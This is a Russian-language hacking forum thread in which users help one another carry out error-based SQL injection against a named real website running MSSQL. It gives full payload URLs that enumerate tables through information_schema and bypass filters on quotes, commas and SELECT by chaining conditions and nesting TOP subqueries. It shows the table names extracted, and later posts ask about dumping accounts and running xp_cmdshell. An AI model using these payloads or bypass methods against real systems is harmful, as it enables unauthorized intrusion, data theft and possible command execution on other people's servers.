о боги, боги мои, яду мне, яду!!! ты вот понимаешь для чего тут нужен знак неравенства <>? вобщем так тогда делай: 1+or+1=(select(max(table_name))from[information_schema].tables+where+table_name+not+in+(0x7379737365676D656E7473))--
message: Line 5: Incorrect syntax near '56E7473'. (severity 15) Warning: mssql_query() [function.mssql-query]: message: The floating point value '56E7473' is out of the range of computer representation (8 bytes). (severity 15) Warning: mssql_query() [function.mssql-query]: message: Line 5: Incorrect syntax near '56E7473'. (severity 15)
вывод результата снова тот же что и в начале) Warning: mssql_query() [function.mssql-query]: message: Syntax error converting the nvarchar value 'syssegments' to a column of data type int. (severity 16) Warning: mssql_query() [function.mssql-query]: Query failed
вобщем вот вам линка... долго дрючил свой мозг так и не доходит надеюсь на вашу помощь http://trot.telenet.ru/la2info/?part=npcs&id=-35332+or+1=(select(max(table_name))from[information_schema].tables+where+table_name+not+in+(0x7379737365676D656E7473))--
HTML: http://trot.telenet.ru/la2info/?part=npcs&id=-35332+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(select+top+1+table_name+from+information_schema.tables))-- во втором подзапросе перебираем TOP 1,2,3 ... вот таблички которые я вытащил:
Там просто стоят фильтры... Которые вырезают кавычки, запятые, знаки сравнения, слово SELECT в верхнем регистре... Ну в общем фильтры они и есть фильтры, правда в нашем случае они вполне обходимые: Code: http://trot.telenet.ru/la2info/?part=npcs&id=-35332+OR+1=@@version-- http://trot.telenet.ru/la2info/?part=npcs&id=-35332+OR+1=(select+top+1+table_name+from+information_schema.tables)-- http://trot.telenet.ru/la2info/?part=npcs&id=-35332+OR+1=(select+top+1+table_name+from+information_schema.tables+where+table_name!="henna")-- http://trot.telenet.ru/la2info/?part=npcs&id=-35332+OR+1=(select+top+1+table_name+from+information_schema.tables+where+table_name!="henna"+and+table_name!="castle_names")-- http://trot.telenet.ru/la2info/?part=npcs&id=-35332+OR+1=(select+top+1+table_name+from+information_schema.tables+where+table_name!="henna"+and+table_name!="castle_names"+and+table_name!="classes")-- Обрати внимание, что перечисление таблиц делается не через привычный NOT IN, так как запятая вырезается, а через сцепление условий имя_поля!='значение1' and имя_поля!='значение2' and ... Вот имена таблиц которые удалось вытащить (это не все): Code: henna castle_names classes drops dtproperties exp fish_items fish_params item_names items locations В общем дерзай... Просто обход делай не через множество, а через сцепление условий, пускай это будет долго, но зато в обход фильтрации... В принципе можно отсеивать записи пачками используя для каждой ветки and условие NOT LIKE "...". Обрати внимание, что одинарные кавычки тоже вырезаются...
гдето уже видел такой пример но ищо раз повторю имена таблиц можно перебирать подзапросом меняя значение 2го топа: top 1, top 2 итд Code: http://trot.telenet.ru/la2info/?part=npcs&id=-35332'+OR+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(select+top+2+table_name+from+information_schema.tables))-- вот мы и обошлись без кавычек
ААФигеть вы умные %) -=megahertz=-, ну и как ВСЁ удалось ? 1)Я так понимаю, что в этой базе нет таблицы accounts.... 2)Выводить сразу большой список не выйдет? 3)А возможно сделать запрос к другой базе на этом же серве(например master)? Ну киньте плиз пример запроса для чтения полей и их значений в этих таблицах??? 4)возможно ли как-то выполнить такой запрос ?part=npcs&id=-35332+OR+1=(exec+master..xp_cmdshell+”ipconfig”) Что я не так делаю? 5)Может есть хотя бы ссылка где это обсуждалось подробно? 6)Можно ли вообще узнать список всех баз на этом сервере как-нибудь(master...northwind и т.д.)? ...плиз...
А я не расскажу) Нашел ссылки на снятие дампа, но ни одна не работает...Есть рабочая??? И вопрос про exec не раскрыт...) ...через ; надо делать?...не получается что-то...
https://forum.antichat.ru/thread24918.html https://forum.antichat.ru/thread28461.html MSSQL Extractor